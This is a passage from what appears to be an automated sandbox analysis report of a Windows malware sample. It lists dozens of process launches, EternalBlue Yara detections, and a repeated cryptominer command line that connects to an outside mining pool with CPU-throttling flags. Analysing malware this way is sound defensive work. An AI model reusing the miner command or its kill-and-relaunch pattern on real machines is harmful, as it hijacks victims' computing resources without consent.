Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:38:59
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:38:59
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:38:59
Start date:	14/06/2024
Path:	C:\Users\user\Desktop\x00zm3KVwb.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\x00zm3KVwb.exe
Imagebase:	0x330000
File size:	9'402'368 bytes
MD5 hash:	2CF24966A6AAD7B6ECFFE04A20EAF3DD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: INDICATOR_TOOL_EXP_EternalBlue, Description: Detects Windows executables containing EternalBlue explitation artifacts, Source: 00000013.00000000.2023397637.00000000005EA000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: INDICATOR_TOOL_EXP_EternalBlue, Description: Detects Windows executables containing EternalBlue explitation artifacts, Source: 00000013.00000002.2029337004.00000000005EA000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:38:59
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:38:59
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:38:59
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:38:59
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ipconfig /flushdns
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:38:59
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:38:59
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	ipconfig /flushdns
Imagebase:	0x480000
File size:	29'184 bytes
MD5 hash:	3A3B9A5E00EF6A3F83BF300E2B6B67BB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\ProgramData\syabcd.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Imagebase:	0x7ff66fae0000
File size:	1'361'920 bytes
MD5 hash:	23D84A7ED2E8E76D0A13197B74913654
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 70%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\ProgramData\syabcd.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Imagebase:	0x7ff66fae0000
File size:	1'361'920 bytes
MD5 hash:	23D84A7ED2E8E76D0A13197B74913654
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\ProgramData\syabcd.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Imagebase:	0x7ff66fae0000
File size:	1'361'920 bytes
MD5 hash:	23D84A7ED2E8E76D0A13197B74913654
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	10:39:00
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\ProgramData\syabcd.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Imagebase:	0x7ff66fae0000
File size:	1'361'920 bytes
MD5 hash:	23D84A7ED2E8E76D0A13197B74913654
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\ProgramData\syabcd.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Imagebase:	0x7ff66fae0000
File size:	1'361'920 bytes
MD5 hash:	23D84A7ED2E8E76D0A13197B74913654
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\Users\user\Desktop\x00zm3KVwb.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\x00zm3KVwb.exe
Imagebase:	0x330000
File size:	9'402'368 bytes
MD5 hash:	2CF24966A6AAD7B6ECFFE04A20EAF3DD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: INDICATOR_TOOL_EXP_EternalBlue, Description: Detects Windows executables containing EternalBlue explitation artifacts, Source: 0000003E.00000002.2054520741.00000000005EA000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: INDICATOR_TOOL_EXP_EternalBlue, Description: Detects Windows executables containing EternalBlue explitation artifacts, Source: 0000003E.00000000.2047317453.00000000005EA000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\ProgramData\syabcd.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Imagebase:	0x7ff66fae0000
File size:	1'361'920 bytes
MD5 hash:	23D84A7ED2E8E76D0A13197B74913654
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	10:39:01
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	10:39:02
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	10:39:02
Start date:	14/06/2024
Path:	C:\ProgramData\syabcd.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Imagebase:	0x7ff66fae0000
File size:	1'361'920 bytes
MD5 hash:	23D84A7ED2E8E76D0A13197B74913654
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	10:39:02
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	10:39:02
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	10:39:02
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	10:39:02
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	10:39:02
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	10:39:02
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	10:39:02
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	10:39:02
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	10:39:02
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	10:39:02
Start date:	14/06/2024
Path:	C:\ProgramData\syabcd.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
